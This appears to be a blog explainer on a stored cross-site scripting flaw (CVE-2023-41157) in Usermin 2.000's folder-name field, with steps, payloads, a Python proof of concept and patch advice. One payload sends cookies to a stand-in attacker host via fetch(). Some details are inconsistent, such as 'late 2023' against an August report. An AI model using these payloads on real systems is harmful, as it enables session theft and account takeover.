Usermin is a popular web-based interface that allows users to manage their email, change passwords, and perform other common tasks. In late 2023, security researchers discovered a set of serious *stored cross-site scripting (XSS)* vulnerabilities in Usermin version 2.000. These vulnerabilities are tracked as CVE-2023-41157.
In this long read, we’ll break down what this vulnerability is, show you how the exploit works, and discuss possible ways attackers could abuse it.
What is Stored XSS?
Stored XSS occurs when an attacker is able to inject malicious JavaScript code into a web application, and this code is saved or “stored” in the system. This usually means other users, including administrators, can be affected when they load the compromised page.
Where’s the Bug in Usermin?
The reported vulnerabilities in Usermin 2.000 let attackers inject HTML or JavaScript code through the folder name parameter in three places:
The “Forward Mail” tab
Whenever a user creates a new email folder using these features, the text they enter for the folder name is not properly sanitized. This means attackers can create folders with names that actually contain malicious code. When anyone later views these folders, the code will run in their browser.
Step 1: Log in to Usermin
The attacker logs into their regular Usermin account. No admin privileges needed.
Step 2: Create a Malicious Folder
They go to any of these tabs:
Mail, Filters, or Forward Mail and choose to “Add” or “Create New Folder”.
In the “Folder name” box, they paste this
<script>alert('XSS via Folder Name');</script>
Or, to be stealthier, something like
<img src="x" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
Step 3: Wait for a Victim to View
Anyone who loads the affected section (_including the attacker, a user, or even an admin_) will have this JavaScript code executed in their browser context.
Proof of Concept (PoC) Code
Here’s a simplified proof-of-concept for creating a malicious folder via a POST request (for automation):
import requests
url = 'https://target.example.com:20000/mailbox';
cookies = {"sessionid": "<valid-sessionid>"} # Login session required
data = {
"add": "1",
"folder": "<script>alert('XSS');</script>",
# Other form fields go here if required
}
r = requests.post(url, data=data, cookies=cookies)
print(r.text) # Should see the script reflected when you reload folders
What Happens?
- If a legitimate user opens their folders tab, the malicious code inside the new folder’s name runs automatically.
- Attackers can steal session cookies, redirect users, show fake login boxes, or even launch attacks on admins.
Worming: Attacks can self-propagate by creating more malicious folders or filters.
- Full Account Takeover: If an admin is tricked into opening the page, they risk losing control over the whole system.
How Was This Discovered?
The vulnerability was reported and confirmed by security researcher NinjaDuck on Huntr.dev in August 2023. See the original advisory here:
🔗 huntr.com Entry - CVE-2023-41157
Official NIST entry:
🔗 NVD - CVE-2023-41157
If you run Usermin 2.000 or earlier
- Upgrade immediately to the latest Usermin release (2.001 or above).
Developers fixed this by properly HTML-escaping the folder name wherever it’s rendered.
- As a temporary measure, you can block folder names with < and > characters, but this is not a full fix.
Summary
CVE-2023-41157 is a classic case of stored XSS, but its impact is huge because attackers only need a regular email account. If exploited, it can lead to full compromise of your webmail, credential theft, and system administration controls.
Protect yourself: keep Usermin updated, review your other web interfaces, and always validate input on the server.
Further Reading
- OWASP XSS Explained (Simple Tips)
- How to Prevent XSS in PHP & Perl
- Usermin Official Updates & Downloads
Timeline
Published on: 09/16/2023 06:15:07 UTC
Last modified on: 09/20/2023 13:23:42 UTC